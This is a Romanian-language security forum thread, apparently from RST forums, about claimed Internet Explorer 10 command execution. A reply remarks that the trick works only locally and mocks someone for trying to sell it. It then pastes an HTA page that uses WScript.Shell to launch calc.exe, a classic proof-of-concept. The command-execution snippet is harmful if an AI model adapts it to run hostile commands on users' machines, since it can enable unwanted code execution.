Jump to content
Nytro

IE 10 - Command execution

Recommended Posts

Am testat si eu dar merge numai local :))

In topicul asta tot asa cred ca foloseste local scriptul de aicia

MS13-009 Internet Explorer WScript.Shell Remote Code Excution

https://rstforums.com/forum/68132-ms13-009-internet-explorer-wscript-shell-remote-code-excution.rst

si vrea sa vinda :))


<html>
<head>
<title>Application Executer</title>
<HTA:APPLICATION ID="oMyApp"
APPLICATIONNAME="Application Executer"
BORDER="no"
CAPTION="no"
SHOWINTASKBAR="yes"
SINGLEINSTANCE="yes"
SYSMENU="yes"
SCROLL="no"
WINDOWSTATE="normal">
<script type="text/javascript" language="javascript">
function RunFile() {
WshShell = new ActiveXObject("WScript.Shell");
WshShell.Run("c:/windows/system32/calc.exe", 1, false);
}
</script>
</head>
<body>
<input type="button" value="Run calc" onclick="RunFile();"/>
</body>
</html>



Edited by neox
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...